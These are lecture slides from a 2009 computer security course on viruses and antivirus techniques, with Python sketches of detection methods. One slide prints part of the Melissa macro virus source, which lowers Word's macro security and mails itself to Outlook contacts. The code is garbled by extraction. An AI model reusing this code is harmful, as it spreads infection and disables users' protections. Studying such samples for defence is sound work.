CSE 127 Computer Security Spring 2009 Malware I

CSE 127 Computer Security, Spring 2009
Malware I: Viruses and virus-defense
Stefan Savage
Many slides courtesy of Carey Nachenberg

Recap
  • Various ways to compromise software systems based on input and timing
      • Buffer overflows, format string errors, TOCTOU, SQL injection, XSS, etc.
  • But once you’ve compromised a system, what does the malicious software do?
  • First: it propagates itself to create an installed base
  • Today: viruses, the oldest mass malware
15 September 2020

Reminder
  • You have a project due on Tuesday

Viruses
  • A computer virus is a (malicious) program that
      • Attaches to a host program or data
      • Creates (possibly modified) copies of itself
      • Carries a payload that may have other effects (deleting files, opening backdoors, printing messages, etc.)
  • Viruses traditionally require some user action to activate (e.g., executing a file, opening a spreadsheet)

Virus Writer’s Goals
  • Hard to detect
  • Hard to destroy or deactivate
  • Spreads infection widely/quickly
  • Can reinfect a host
  • Easy to create

Kinds of Viruses
  • Boot Sector Viruses
      • Historically important, but less common today
  • Memory Resident Viruses
      • Standard infected executable
  • Macro Viruses
      • Embedded in documents (like Word docs)
  • E-mail/IM Viruses
      • Spread via attachments
  • Web platform viruses
      • Spread on Web sites (e.g., social net applications)

Boot sector Viruses (old school)
  • Bootstrap process:
      • Firmware (ROM) copies the MBR (master boot record) to memory, jumps to that program
  • MBR (or Boot Sector)
      • Fixed position on disk
      • “Chained” boot sectors permit longer bootstrap loaders
[Diagram: MBR → boot → boot]

Boot sector Viruses
  • Virus breaks the chain
  • Inserts virus code
  • Reconnects chain afterwards
[Diagram: MBR → boot → virus → boot]

Why attack the Bootstrap?
  • Automatically executed before the OS is running
      • And thus, before detection tools are running
  • OS hides boot sector information from users
      • Hard to discover that the virus is there
      • Harder to fix
  • Any good virus scanning software scans the boot sectors
      • But good boot-sector viruses may restore the good boot sector during normal operation (replacing it when you log out or when anti-virus software isn’t running)
      • Boot-sector malware is back with a vengeance (Mebroot/Sinowal)

Virus Attachment to Host Code
  • Simplest case: insert copy at the beginning of an executable file
      • Runs before other code of the program
      • Historically most common program virus
  • Runs before & after original program
      • Virus can clean up after itself
  • Virus could modify code in place
      • Doesn’t change size, but could change behavior
      • Maybe harder to detect?
[Diagram: Original Program vs. Modified Program]

Macro Viruses
  • Many applications support macros
  • Macros are just programs
  • Word processors & spreadsheets
      • Startup macro
      • Macros turned on by default
  • Visual Basic Script (VBScript)

Melissa Macro Virus
  • Implementation
      • VBA (Visual Basic for Applications) code associated with the "document.open" method of Word
  • Strategy
      • Email message containing an infected Word document as an attachment (social engineering)
      • Opening the Word document triggers the virus if macros are enabled
      • Under certain conditions, included attached documents created by the victim

Melissa Macro Virus: Behavior
  • Setup
      • Lowers the macro security settings
      • Permits all macros to run without warning
      • Checks registry for key value “… by Kwyjibo”
      • HKEY_Current_User\Software\Microsoft\Office\Melissa?
  • Propagation
      • Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro

Melissa Macro Virus: Behavior
  • Propagation continued
      • Infects the Normal.dot template file
      • Normal.dot is used by all Word documents
  • “Joke”
      • If the minute matches the day of the month, the macro inserts the message “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”

// Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice9. 0WordSecurity", "Level") <> "" Then Command. Bars("Macro"). Controls("Security. . . "). Enabled = False System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice9. 0WordSecurity", "Level") = 1& Else Command. Bars("Tools"). Controls("Macro"). Enabled = False Options. Confirm. Conversions = (1 - 1): Options. Virus. Protection = (1 - 1): Options. Save. Normal. Prompt = (1 - 1) End If Dim Unga. Das. Outlook, Das. Mapi. Name, Break. Um. Off. ASlice Set Unga. Das. Outlook = Create. Object("Outlook. Application") Set Das. Mapi. Name = Unga. Das. Outlook. Get. Name. Space("MAPI") 15 September 2020 17

If System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice", "Melissa? ") <> ". . . by Kwyjibo" Then If Unga. Das. Outlook = "Outlook" Then Das. Mapi. Name. Logon "profile", "password" For y = 1 To Das. Mapi. Name. Address. Lists. Count Set Addy. Book = Das. Mapi. Name. Address. Lists(y) x=1 Set Break. Um. Off. ASlice = Unga. Das. Outlook. Create. Item(0) For oo = 1 To Addy. Book. Address. Entries. Count Peep = Addy. Book. Address. Entries(x) Break. Um. Off. ASlice. Recipients. Add Peep x=x+1 If x > 50 Then oo = Addy. Book. Address. Entries. Count Next oo Break. Um. Off. ASlice. Subject = "Important Message From " & Application. User. Name Break. Um. Off. ASlice. Body = "Here is that document you asked for. . . don't show anyone else ; -)" Break. Um. Off. ASlice. Attachments. Add Active. Document. Full. Name Break. Um. Off. ASlice. Send Peep = "" Next y Das. Mapi. Name. Logoff End If

Melissa Virus
  • Transmission rate
      • The first confirmed reports of Melissa were received on Friday, March 26, 1999.
      • By Monday, March 29, it had reached more than 100,000 computers.
      • One site got 32,000 infected messages in 45 minutes.
  • Damage
      • Denial of service: mail systems off-line.
      • Could have been much worse
  • Remedy
      • Filter mail for the virus signature (macro in .doc files)
      • Don’t run macros in unknown documents by default
      • Clean Normal.dot

Detecting Viruses
  • Scanning
  • Integrity checking
  • Heuristic detection
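
Of the three approaches, integrity checking is the easiest to sketch. The following is a minimal illustration, not how any particular product works: it assumes SHA-256 digests recorded while files are known to be clean, and the file names and contents are made up for the example.

```python
import hashlib

def fingerprint(data: bytes) -> str:
    """Return the SHA-256 digest of a file's contents as a hex string."""
    return hashlib.sha256(data).hexdigest()

def changed_files(baseline: dict[str, str], current: dict[str, bytes]) -> list[str]:
    """List the names whose current contents no longer match the recorded digest."""
    return sorted(
        name for name, data in current.items()
        if name in baseline and fingerprint(data) != baseline[name]
    )

# Record digests while the files are known to be clean (hypothetical files) ...
clean = {"editor.exe": b"original program bytes", "notes.txt": b"hello"}
baseline = {name: fingerprint(data) for name, data in clean.items()}

# ... and compare later: here editor.exe has had a few bytes appended.
later = {"editor.exe": b"original program bytes" + b"\x90\x90", "notes.txt": b"hello"}
print(changed_files(baseline, later))
```

An integrity checker like this flags any change, malicious or not, so it says that a file was modified rather than which virus modified it.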

Virus Signatures
  • Viruses can’t be completely invisible:
      • Code must be stored somewhere
      • Virus must do something when it runs
      • Idea: look in files for “signature” byte sequences that are unique to the virus
  • Issues
      • Where to scan (beginning of file, whole file, registry settings, etc.)
      • How to scan (look for “ILOVEYOU” string, or actually execute program)
      • How long to scan (tradeoffs in performance/coverage)
      • How to distinguish polymorphs (research issue)
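
The signature idea can be sketched in a few lines. This is a simplified illustration that scans a whole buffer for fixed byte strings; the signature names and the hex pattern are placeholders invented for the example, not real virus signatures.

```python
# Hypothetical signature database: name -> byte sequence to look for.
SIGNATURES = {
    "Example.A": bytes.fromhex("deadbeef0102"),  # made-up byte pattern
    "Example.B": b"ILOVEYOU",                    # the string mentioned on the slide
}

def scan(data: bytes, signatures: dict[str, bytes] = SIGNATURES) -> dict[str, int]:
    """Return {signature name: offset of first match} for every signature found in data."""
    hits = {}
    for name, pattern in signatures.items():
        offset = data.find(pattern)
        if offset != -1:
            hits[name] = offset
    return hits

sample = b"\x00" * 10 + b"ILOVEYOU" + b"\x00"
print(scan(sample))
```

Scanning the whole file for every pattern is the simplest answer to "where to scan"; the later slides are about avoiding that cost.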

The Simple Virus
[Figure: disassembly listings (address, machine code, mnemonic) of an infected program and of a new host program before and after infection; in the last frame a JMP to the appended virus code has been written at the start of the new program]
1. User runs an infected program.
2. Program transfers control to the virus.
3. Virus locates a new program.
4. Virus appends its logic to the end of the new file.
5. Virus updates the new program so the virus gets control when the program is launched.

Head/Tail Scanners
Most of these application-infecting viruses attached themselves to either the top or bottom of the host file.
[Diagram: virus placed before or after the host]
So anti-virus engineers built head/tail scanners. The scanner loads the head and tail regions of the file into a buffer and then scans with a multi-string search algorithm.
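
A head/tail scanner can be sketched roughly as follows. The 4096-byte window is an assumption for illustration, and repeated `bytes.find` calls stand in for the multi-string search algorithm a real scanner would use.

```python
def head_tail_regions(data: bytes, window: int = 4096) -> list[tuple[int, bytes]]:
    """Return (file offset, bytes) pairs for the head and tail windows of data."""
    if len(data) <= 2 * window:
        return [(0, data)]  # small file: the windows would overlap, so scan it all
    return [(0, data[:window]), (len(data) - window, data[-window:])]

def head_tail_scan(data: bytes, signatures: dict[str, bytes], window: int = 4096):
    """Search only the head and tail windows; return (name, file offset) hits."""
    hits = []
    for base, region in head_tail_regions(data, window):
        for name, pattern in signatures.items():
            pos = region.find(pattern)
            if pos != -1:
                hits.append((name, base + pos))
    return hits

sigs = {"Example": b"MARK"}                    # placeholder signature
appended = b"A" * 10000 + b"MARK"              # pattern at the end of the file
buried = b"A" * 5000 + b"MARK" + b"A" * 5000   # pattern in the middle
print(head_tail_scan(appended, sigs))
print(head_tail_scan(buried, sigs))
```

The second call finds nothing because the pattern lies outside both windows, which is the weakness of scanning only the head and tail.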

So what do the bad guys do?
  • Move the virus to the middle of the file
  • Becomes prohibitively expensive to scan
      • Must scan whole file
  • Solution: scalpel scanning
      • Idea: limit scanning to likely entry-points for viruses
      • If you have more time you can also scan for more than just strings (regular expressions)

Scalpel Scanning
1. Locate the main program entry-point.
2. While the current instruction is a JUMP or a CALL instruction, trace it.
3. If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file.
[Figure: disassembly listing in which a chain of JMP instructions starting at the entry point (JMP 106, JMP 112, JMP 117) leads to the region to be scanned]
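
The three steps above can be sketched for a flat 16-bit code image. This is a toy under stated assumptions: only the x86 opcodes `EB` (JMP rel8), `E9` (JMP rel16) and `E8` (CALL rel16) are traced, offsets are file offsets, and the 64-byte scan window and the signature are invented for the example.

```python
import struct

def follow_jumps(code: bytes, entry: int = 0, max_hops: int = 32) -> int:
    """Trace JMP/CALL instructions from entry; return the offset where tracing stops."""
    pos = entry
    for _ in range(max_hops):
        if pos < 0 or pos >= len(code):
            break
        op = code[pos]
        if op == 0xEB and pos + 2 <= len(code):            # JMP rel8
            (rel,) = struct.unpack_from("<b", code, pos + 1)
            pos = pos + 2 + rel
        elif op in (0xE9, 0xE8) and pos + 3 <= len(code):  # JMP rel16 / CALL rel16
            (rel,) = struct.unpack_from("<h", code, pos + 1)
            pos = pos + 3 + rel
        else:
            break                                          # not a JUMP or CALL: stop here
    return pos

def scalpel_scan(code: bytes, signatures: dict[str, bytes],
                 entry: int = 0, window: int = 64) -> list[str]:
    """Scan only the region the entry point's jump chain leads to."""
    start = follow_jumps(code, entry)
    if not 0 <= start < len(code):
        return []
    region = code[start:start + window]
    return [name for name, pattern in signatures.items() if pattern in region]

# Entry jumps to offset 6, which jumps to offset 20, where straight-line code begins.
code = b"\xEB\x04" + b"\x00" * 4 + b"\xE9\x0B\x00" + b"\x00" * 11 + b"\xB4\x35MARK"
print(follow_jumps(code), scalpel_scan(code, {"Example": b"MARK"}))
```

Only one small window is searched per file, which is what makes this cheaper than a whole-file scan.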

The Encrypted Virus
Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains. These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus. Each time the virus infects a new file, it changes the encryption key so the virus body looks different.
[Diagram: two infected hosts, each with the same decryptor but a different key (KEY 1, KEY 2) and a different encrypted body (Wjsvt, Uhqtr)]

The Encrypted Virus
First infection:
1. MOV DI, 120h
2. MOV AX, [DI]
3. XOR AX, 5132h
4. MOV [DI], AX
5. ADD DI, 2h
6. CMP DI, 2500h
7. JNE 3
8. WJSVTPBMZPL
9. NAADJGNANW
...
Second infection:
1. MOV DI, 120h
2. MOV AX, [DI]
3. XOR AX, 0030h
4. MOV [DI], AX
5. ADD DI, 2h
6. CMP DI, 2500h
7. JNE 3
8. PKEPAJHENZAW
9. MNANTPOOTIZN
...
The decryption routine stays the same. Only the key(s) change. The encrypted body changes.
Still easy to detect because the decryption loop stays the same.

The Polymorphic Virus
  • Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm
  • When infecting a new file, such a virus:
      • Generates brand-new decryption code from scratch
      • Encrypts a copy of itself using a complementary encryption algorithm
      • Inserts both the new decryption code and the encrypted body of the virus into the target file

The Polymorphic Virus
[Animation: an infected host program (Host Program, Decryption Loop, Virus, Mutation Engine) is loaded into RAM and infects a new host program on disk]
1. User executes program.
2. Virus decrypts itself.
3. Virus finds new program.
4. Mutation engine creates new decryptor.
5. Virus makes a new copy of itself and encrypts this copy.
6. Virus appends the new decryptor and encrypted virus body to the new file.
And we have a new infection!

The Polymorphic Virus
[Figure: two disassembly listings (address, machine code, mnemonic). The first, at addresses 0100 to 017C, ends in a JNZ back to 011E; the second, at addresses 0200 to 023D, ends in a JNZ back to 0205. The two share almost no byte sequences.]
Here we have a decryption loop from an MtE-based virus infection. And here’s a second-generation decryption loop of the same virus strain.

Detecting The Polymorphic Virus
So how do we detect such a beast?
1. Use lots of wildcard strings/scripts:
   B98104%F%1BD??%FBE??%F%53142??%F??C0%F45%F??CC%FE2
   B98104%8BB??%FBE??%F%53140??%F??C0%F43%F??CC%FE2
   B98104%F%5BE??%F%53144??%F??C0%F46%F??CC%FE2
   B98104%F%9BF??%F%53145??%F??C0%F47%F??CC%FE2
   B98104%F%1BD??%FBF??%F%53143??%F??C0%F47%F??CC%FE2
   B98104%8BB??%F%1BF??%F%53141??%F??C0%F47%F??CC%FE2
   The number of strings (alg. sigs) explodes quickly!
   Detecting the decryption loop is prone to false positives!
2. X-ray techniques (plaintext attack on encrypted virus body)
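
Wildcard signatures can be illustrated by translating them into regular expressions over bytes. The syntax below is an assumption made for this sketch, not necessarily the notation used in the strings above: two hex digits are a literal byte, `??` matches any one byte, and `%N` (N a single hex digit) skips between 0 and N bytes.

```python
import re

def compile_wildcard(sig: str) -> re.Pattern:
    """Translate a hex signature with wildcards into a compiled bytes regex.

    Assumed syntax: 'XX' literal byte, '??' any single byte, '%N' skip 0..N bytes.
    """
    parts = []
    i = 0
    while i < len(sig):
        if sig[i] == "%":
            n = int(sig[i + 1], 16)
            parts.append(b".{0,%d}" % n)           # bounded gap
            i += 2
        elif sig[i:i + 2] == "??":
            parts.append(b".")                     # any one byte
            i += 2
        else:
            parts.append(re.escape(bytes([int(sig[i:i + 2], 16)])))
            i += 2
    return re.compile(b"".join(parts), re.DOTALL)  # DOTALL: '.' also matches 0x0A

pattern = compile_wildcard("B98104%3CD??")          # made-up signature
near = bytes.fromhex("00B98104AABBCD21FF")          # two filler bytes before CD
far = bytes.fromhex("B98104AABBCCDDCD21")           # four filler bytes: gap too long
print(bool(pattern.search(near)), bool(pattern.search(far)))
```

Each extra wildcard makes a signature match more decryptor variants but also more innocent code, which is the false-positive problem noted above.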

X-ray scanning
Assume the file is infected and perform a known-plaintext attack on the encrypted virus code. This only works for simple schemes (but it’s often sufficient).
Scanned file:       60 5C 5D 47 14 55 14 40 51 47 40
Virus plain-text:   54 68 69 73 20 61 20 74 65 73 74
XOR of each pair:   34 34 34 34 34 34 34 34 34 34 34
The key must be 34! The scheme must be XOR!
[Diagram: host program followed by encrypted bytes; 7 bytes from EOF = “VIRUS”?]
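
The XOR case from this slide can be checked mechanically. The sketch below assumes the simplest scheme only, a single-byte XOR key, and slides the known plaintext across the scanned bytes looking for an offset where one key explains every byte.

```python
def xray_xor(ciphertext: bytes, known_plaintext: bytes) -> list[tuple[int, int]]:
    """Return (offset, key) pairs where known_plaintext XOR key equals the ciphertext."""
    n = len(known_plaintext)
    if n == 0:
        return []
    hits = []
    for off in range(len(ciphertext) - n + 1):
        key = ciphertext[off] ^ known_plaintext[0]   # key implied by the first byte
        window = ciphertext[off:off + n]
        if all(c ^ p == key for c, p in zip(window, known_plaintext)):
            hits.append((off, key))
    return hits

scanned = bytes.fromhex("605c5d4714551440514740")    # bytes from the slide
plain = bytes.fromhex("5468697320612074657374")      # known virus plain-text
for offset, key in xray_xor(scanned, plain):
    print(f"offset {offset}, key {key:02X}")
```

With a very short plaintext almost any window yields a consistent key, so the known fragment needs to be long enough to make accidental matches unlikely.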

“Generic” Decryption
  • Invented by Alan Solomon (a.k.a. Dr. Solomon)
      • Chose name to obscure how it worked
  • Assumptions
      • Virus gains control of the host immediately
      • Virus decrypts itself deterministically
      • Virus has some static body that can be detected with traditional signatures
  • Key idea:
      • Emulate code execution until the virus decrypts itself
          » Typically use some sort of virtual machine (VM) environment
      • Search for signatures in memory

Generic Decryption
[Animation: the program is loaded off disk into a virtual machine with a simulated OS and other data structures. As the decryption loop runs (1. Fetch byte, 2. Decrypt byte, 3. Store byte, 4. Loop to 1, and on it goes...), more and more of the virus body is marked as modified memory. Final frame: KILL.]
1. Load suspected program into VM.
2. Allow the program to execute normally.
3. “Tag” all modified memory as the program executes.
4. Scan all modified areas of virtual memory for virus signatures.
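
The four steps can be illustrated with a toy emulator. Everything here is invented for the sketch: the five-instruction "machine" (`mov`, `xorb`, `inc`, `jlt`, `halt`), the placeholder body, and the signature. A real generic-decryption engine emulates actual CPU instructions.

```python
def emulate(program, memory: bytearray, max_steps: int = 10_000) -> set[int]:
    """Run a toy program against memory and return the set of addresses it modified."""
    regs, pc, dirty = {}, 0, set()
    for _ in range(max_steps):
        if pc >= len(program):
            break
        op, *args = program[pc]
        pc += 1
        if op == "mov":                  # mov reg, immediate
            regs[args[0]] = args[1]
        elif op == "xorb":               # fetch byte at [reg], XOR with key, store back
            addr = regs[args[0]]
            memory[addr] ^= args[1]
            dirty.add(addr)              # step 3: tag modified memory
        elif op == "inc":
            regs[args[0]] += 1
        elif op == "jlt":                # jump to target while reg < immediate
            if regs[args[0]] < args[1]:
                pc = args[2]
        else:                            # "halt" or anything unknown stops emulation
            break
    return dirty

def scan_dirty(memory: bytearray, dirty: set[int], signatures: dict[str, bytes]) -> list[str]:
    """Step 4: scan only the span of memory the program wrote to."""
    if not dirty:
        return []
    region = bytes(memory[min(dirty):max(dirty) + 1])
    return [name for name, pattern in signatures.items() if pattern in region]

body = b"EXAMPLE-MARKER"                                  # harmless stand-in for a virus body
memory = bytearray(b"\x00" * 16 + bytes(b ^ 0x34 for b in body))
program = [("mov", "di", 16), ("xorb", "di", 0x34), ("inc", "di"),
           ("jlt", "di", 16 + len(body), 1), ("halt",)]
sigs = {"Example": b"MARKER"}

print(b"MARKER" in bytes(memory))                         # static scan of the encrypted image
print(scan_dirty(memory, emulate(program, memory), sigs)) # scan after emulation
```

The `max_steps` cap is the crude form of the "how long to emulate" question.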

Challenges with GD
  • How long to emulate program?
      • Emulate too long and the system slows to a crawl
      • Don’t emulate enough and you might miss the virus
  • Two approaches
      • Heuristic-driven emulation
          » Emulate while you see “suspicious” behavior (unusual instruction sequences, sequential modifications of memory, etc.)
          » Suffers from false positives and false negatives & can be avoided
          » Prolongs execution on uninfected files
      • Profile-driven emulation

Profile-based Emulation
For each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti-virus data files.
Fetch and emulate instructions from a program file as long as its instructions are consistent with at least one polymorphic virus profile. When all viruses have been eliminated from consideration, cease emulation.
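
The stopping rule can be sketched as set filtering. The profile names and opcode sets below are hypothetical, and a real profile would capture more than the opcodes a strain's decryptor may use.

```python
# Hypothetical profiles: opcodes each polymorphic engine's decryptors may contain.
PROFILES = {
    "PolyA": {"MOV", "XOR", "ADD", "INC", "JNZ"},
    "PolyB": {"MOV", "ROL", "SUB", "DEC", "JNZ", "NOP"},
}

def steps_to_emulate(opcodes, profiles=PROFILES, max_steps: int = 1000):
    """Return (instructions emulated, profiles still consistent when emulation stopped)."""
    candidates = set(profiles)
    steps = 0
    for op in opcodes[:max_steps]:
        # Drop every profile that could not have produced this instruction.
        candidates = {name for name in candidates if op in profiles[name]}
        if not candidates:
            break                        # all viruses eliminated: cease emulation
        steps += 1
    return steps, candidates

print(steps_to_emulate(["MOV", "INT", "MOV", "MOV"]))            # ordinary program
print(steps_to_emulate(["MOV", "XOR", "ADD", "INC", "JNZ"]))     # consistent with PolyA
```

The ordinary program is dropped after one instruction, while the suspicious one keeps being emulated, which is how profiles reduce the work spent on uninfected files.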

Profile-based Emulation
[Animation: as each instruction of the program (JMP, MOV, INT, MOV, ...) is emulated, its opcode is looked up in a table with one column per opcode (ADD, SUB, XOR, INC, MOV, ROL, INT, DEC, NOP, JMP) and one bit-vector row per polymorphic engine profile (MtE, DSCE, ..., SMEG), and so on...]

Profile-based Emulation
[Diagram: clean files and polymorphic infections (Poly #1 to Poly #5) plotted against the profile regions]
The profiles are specific to each polymorphic virus, limiting the search space. This reduces the number of iterations required on uninfected files.

Problems
  • Time-consuming to generate profiles
      • And if you get one wrong you can miss stuff
  • Lots of ways to get around GD
      • Random viruses
          » V will only run if the time is between 3 and 4 pm
      • Emulator-aware viruses
          » V detects that it is in an emulator and hides
      • Maxed-out iteration viruses
          » V takes too long to emulate
      • Entry-point obscuring viruses

Entry-point Obscuring Viruses
These viruses do not gain control at the main program entry-point. Instead, they modify the host program to transfer control to the virus at some obfuscated point in the program.
[Diagram: PE file layout (MZ and PE headers, Section #1 to #4 info, code, data, .reloc); a JMP placed inside the code section leads to the decryptor and virus body stored in the .reloc section]

What to do…

• Tailored code written to detect each strain of virus (knowledgeable about EPO approach)
• Typically low-level pseudo-code which evaluates the program and can invoke the emulator when necessary
• Fast to execute but can be time-consuming to write
• But it gets worse…
  - Metamorphic viruses
  - Integrated infection

The Metamorphic Virus

These viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere!

Metamorphic strains use the current infection’s code as a template and then expand and contract sets of instructions within the body to create a child infection.

Problems:
1. Huge analysis time for researchers
2. Researchers forced to write new hand-coded detections for each new strain
3. Scanner performance potentially degrades linearly with each new metamorphic detection

Integrated infection

Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic throughout the original logic, and reassemble.

Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare.

Summary: Modern AV programs

• It’s not grep
• Carefully constructed dictionary of known virus signatures
  - Complex algorithmic signatures, not just strings
• Whole system emulator executes programs in sandbox, scanning for signatures during execution
  - Heuristics to determine how long to emulate, when to emulate, etc.
  - Lots of tricks for speed
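
As a small step beyond plain string matching, a signature can allow "don't care" bytes. The sketch below is an assumption for illustration, not how any particular AV product encodes signatures: a pattern is a list whose entries are either an exact byte value or `None` for a wildcard, and `matches_at` and `scan` are hypothetical helper names.

```python
def matches_at(data, offset, pattern):
    """True if pattern matches data at offset; None entries match any byte."""
    if offset + len(pattern) > len(data):
        return False
    return all(p is None or data[offset + i] == p
               for i, p in enumerate(pattern))


def scan(data, pattern):
    """Return the first offset where pattern matches, or -1 if none."""
    for offset in range(len(data) - len(pattern) + 1):
        if matches_at(data, offset, pattern):
            return offset
    return -1
```

For example, `[0xB4, None, 0xCD, 0x21]` matches `MOV AH, <any>` followed by `INT 21` regardless of which function number the code loads.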

Virus Scanning: Pros & Cons

• Pros
  - Effectively detects known viruses before they can cause harm
  - Few false alarms
• Cons
  - Can detect only viruses with known signatures
    » Assumption is that samples can be obtained
  - Signature set must be kept up to date
    » Can take 5 mins to identify a simple signature, days for a complex one
  - Signature set must be distributed to all clients
    » Symantec pushes 1.4 B updates per day (~60 TB)
  - Virus writers can easily change virus signatures
    » Packers…
  - Fundamentally a reactive business

Inoculation

• Most viruses use some kind of marker to identify infected files
• Inoculation: add the marker to clean files so they won’t be infected
• Drawbacks:
  - Markerless or implicit marker viruses (e.g. file size, checksum)
  - Lots of different markers for different viruses; need to change all files

Integrity Checks & whitelists

• Virus scanner computes hash or checksum of executable files (or downloads hash of “known good” files)
  - Assumed to be virus free!
  - Stores the hash information
• Verifies new hash vs. saved one during scan
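
A minimal sketch of the store-then-verify cycle, assuming SHA-256 as the hash and, to keep the example self-contained, file contents held in a dictionary rather than read from disk. The function names are hypothetical.

```python
import hashlib


def fingerprint(data: bytes) -> str:
    """Hash of a file's contents (SHA-256 is an assumption, not from the slides)."""
    return hashlib.sha256(data).hexdigest()


def build_baseline(files):
    """Record a hash for every file; the files are assumed to be virus free."""
    return {name: fingerprint(content) for name, content in files.items()}


def find_modified(files, baseline):
    """Names of files whose current hash differs from the saved one."""
    return sorted(
        name
        for name, content in files.items()
        if name in baseline and fingerprint(content) != baseline[name]
    )
```

Note that the check reports any change, including a legitimate update or recompilation, and it says nothing about files that were already infected when the baseline was taken.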

Integrity Checks: Pros & Cons

• Pros
  - Can detect corruption of executables too
  - Reliable
  - Doesn’t require virus signatures
• Cons
  - False positives (e.g. recompilation, updates)
  - Can’t use it on documents (they change too often)

Behavior-based Detection

• Collection of ad hoc rules that identifies virus behavior or virus-like programs
  - Unusual system call behavior
    » E.g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the network
    » Uncommon syscall/argument patterns from each codepoint
  - Modification of system executables/templates
    » normal.doc
  - Self-modifying and self-referential code
  - Rarely used instructions or lots of NOPs
• This is where the action was until very recently
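
One of the simpler rules above, "lots of NOPs", can be sketched as follows. The byte value 0x90 is the x86 NOP opcode; the threshold of 16 is an arbitrary assumption, and `longest_nop_run` and `looks_suspicious` are hypothetical names.

```python
def longest_nop_run(data: bytes, nop: int = 0x90) -> int:
    """Length of the longest run of consecutive NOP bytes in data."""
    best = run = 0
    for byte in data:
        run = run + 1 if byte == nop else 0
        best = max(best, run)
    return best


def looks_suspicious(data: bytes, threshold: int = 16) -> bool:
    """Flag data containing a NOP run at least `threshold` bytes long."""
    return longest_nop_run(data) >= threshold
```

A rule like this also shows why heuristics are fragile: compilers emit NOP padding in legitimate code, so a low threshold produces false positives and a high one is easy to evade.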

Behavior-based detection: Pros & Cons

• Pros
  - Perhaps able to detect unknown viruses
• Cons
  - Good heuristics are hard to develop
  - Bad heuristics have too many false positives
• All major AV programs have moved to incorporate behavioral techniques

Disinfection

• Ok, you found a virus in a file… now what?
• Standard disinfection
  - Virus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it later
  - To clean: find virus, find original host file beginning, find size of virus. Now move original code to beginning, and truncate file to eliminate virus code
  - Specialized to each virus
• Generic disinfection
  - Run program and emulate until it restores the file to its normal state (so it can execute normally); let the virus itself do the tough work
  - Rewrite cleaned program back to disk
  - Works for roughly 70% of viruses
  - Problems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics (when is the image clean?)
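
The standard-disinfection steps can be sketched for a made-up file layout. Everything about the layout is an assumption for illustration: the virus is appended to the host, its body starts with the marker `VIRUS!`, the three host bytes it overwrote are stored right after the marker, and `disinfect` is a hypothetical name. Real disinfection routines are specialized to each virus, as the slide notes.

```python
MARKER = b"VIRUS!"  # hypothetical byte string marking the start of the virus body
SAVED_LEN = 3       # hypothetical: the virus overwrote the first 3 host bytes


def disinfect(infected: bytes) -> bytes:
    """Restore the host's original first bytes and cut off the appended virus."""
    start = infected.find(MARKER)  # find virus
    if start == -1:
        raise ValueError("virus marker not found")
    saved_at = start + len(MARKER)
    saved = infected[saved_at:saved_at + SAVED_LEN]  # original host beginning
    if len(saved) != SAVED_LEN:
        raise ValueError("saved host bytes are truncated")
    # Move the original bytes back to the beginning and truncate at the virus.
    return saved + infected[SAVED_LEN:start]
```

The sketch fails in exactly the cases listed under Problems: if the virus overwrote host code without saving it, there is nothing to restore.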

Next time…

• Worms (and maybe bots)